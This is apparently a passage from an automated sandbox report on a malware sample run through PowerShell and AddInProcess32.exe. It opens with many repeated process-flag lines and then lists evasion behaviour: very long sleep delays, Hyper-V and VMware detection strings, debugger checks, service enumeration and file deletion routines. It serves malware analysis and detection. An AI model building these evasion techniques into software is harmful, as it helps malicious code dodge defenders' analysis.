                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: 00000005.00000002.1787528120.000002803C402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 7084, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_0040F7E2 Sleep,ExitProcess,23_2_0040F7E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,29_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,23_2_0041A7D9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1708
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 827
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3373
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6470
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6975
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 757
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7457
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1439
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1555
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1846
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 959
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1179
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 5692
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 3929
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: foregroundWindowGot 1754
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 786
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 854
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1571
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe API coverage: 6.2 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe API coverage: 9.4 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3320 Thread sleep count: 3373 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3320 Thread sleep count: 6470 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320 Thread sleep time: -11068046444225724s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240 Thread sleep count: 6975 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320 Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220 Thread sleep count: 757 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260 Thread sleep count: 7457 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252 Thread sleep count: 1439 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324 Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396 Thread sleep count: 1555 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464 Thread sleep count: 1846 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 Thread sleep count: 959 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904 Thread sleep count: 300 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852 Thread sleep count: 1179 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7204 Thread sleep count: 144 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7204 Thread sleep time: -72000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7208 Thread sleep count: 5692 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7208 Thread sleep time: -17076000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7208 Thread sleep count: 3929 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7208 Thread sleep time: -11787000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep count: 786 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1228 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072 Thread sleep count: 854 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5928 Thread sleep count: 1571 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6704 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 21_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,21_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,23_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,23_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,23_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,23_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,23_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_00407877 FindFirstFileW,FindNextFileW,23_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,23_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,23_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,23_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 29_2_0040AE51 FindFirstFileW,FindNextFileW,29_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 30_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,30_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 31_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,31_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,23_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 29_2_00418981 memset,GetSystemInfo,29_2_00418981
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D8B3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V
                    Source: AddInProcess32.exe, 00000015.00000002.3074510288.0000000000F18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203D8B3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmtoolsd
                    Source: powershell.exe, 00000003.00000002.3052721240.0000022054657000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWI
                    Source: powershell.exe, 0000000D.00000002.2593975190.000001ABA1370000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe API call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 21_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,29_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,23_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 21_2_10004AB4 mov eax, dword ptr fs:[00000030h] 21_2_10004AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_00443355 mov eax, dword ptr fs:[00000030h] 23_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 21_2_1000724E GetProcessHeap,21_2_1000724E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 21_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 21_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_10002639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 21_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_10002B1C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0043BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_00434BD8 SetUnhandledExceptionFilter,23_2_00434BD8

